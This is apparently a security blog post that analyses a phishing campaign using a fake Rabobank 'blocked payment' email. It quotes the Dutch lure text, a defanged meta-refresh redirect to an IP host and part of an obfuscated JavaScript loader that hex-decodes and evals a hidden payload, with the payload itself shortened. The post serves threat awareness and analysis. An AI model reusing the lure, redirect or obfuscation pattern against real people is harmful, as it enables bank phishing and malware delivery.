New email based threats based on obfuscated Javascript in Rabobank emails


MX Lab, http://www.mxlab.eu, is intercepting a new email based security threat campaign, based on the obfuscated Javascript technique, with the subject “Blokkering van de betaling door het Rabobank system”.

This campaign has the same characteristics as previous campaigns like Massive email based threat (phishing) campaign targets ABN Amro/Rabobank users, Massive email based threat targets ING users or Emails with subject “ADP Funding Notification – Debit Draft” are a security risk.

The email is send from a spoofed address and informs you about a payment that is being blocked because of wrong bank account details:

Geachte cliënt,
Hierbij deelt de Rabobank u mede, dat uw betaling met het nummer 129983 geblokkeerd is.
De oorzak ervan is dat de afzender in gebreke is gebleven de juiste bankgegevens te verstrekken.

Uw betaalopdracht

Voer alstublieft de correcte bankgegevens van uw ontvanger in, zodat de betaling succesvol kan worden uitgevoerd.

Voor het ongemak bieden wij u onze excuses aan.
Klantenservice van de Rabobank

The malicious URL leads to hxxp://www.mistyorchards.co.za/information.html and on this web page we find the following HTML code:

<meta http-equiv=”refresh” content=”0;url=’hxxp://206.225.85.21/index.php?tp=4d446573c1e75ec4′”></meta>
<html><head><title>Even geduld aub…</title></head><body><a href=”hxxp://206.225.85.21/index.php?tp=4d446573c1e75ec4″>Even geduld aub…</a></body></body></html>

The web browser will show a screen with the message “Please wait” but a redirect will be executed towards the host server 206.225.85.21. The obfuscated Javascript code is present on this location:

<html><body><script>z=function(){e=”ev”;c=””;
d=11;
m=Math;
for(i=32762-1;i>=0;i–){
w=i;
v=a[w];
dd=32762-i-2+1;
b=d;
dd=dd-b*m[“fl”+”oo”+”r”](dd/d);
k=v*1-(dd-8);
if(x&&e)c=c+f(k);
}
md=[“a”];
if(x)ev(c);}
if(z)g=”362321286e71737c39262c2b2a312476646571676161
6d595d66672974746d6269644e6d5d757c29
______SHORTENED_____
a=[];

for(i=0;i<g.length;i+=2){
a.push(parseInt(g.substr(i,2),16));
}
f=String.fromCharCode;
try{x|=eval(“pro”+”to”+”type”);}catch(v){x=1;ev=eval;}
z(123);
</script></body></html>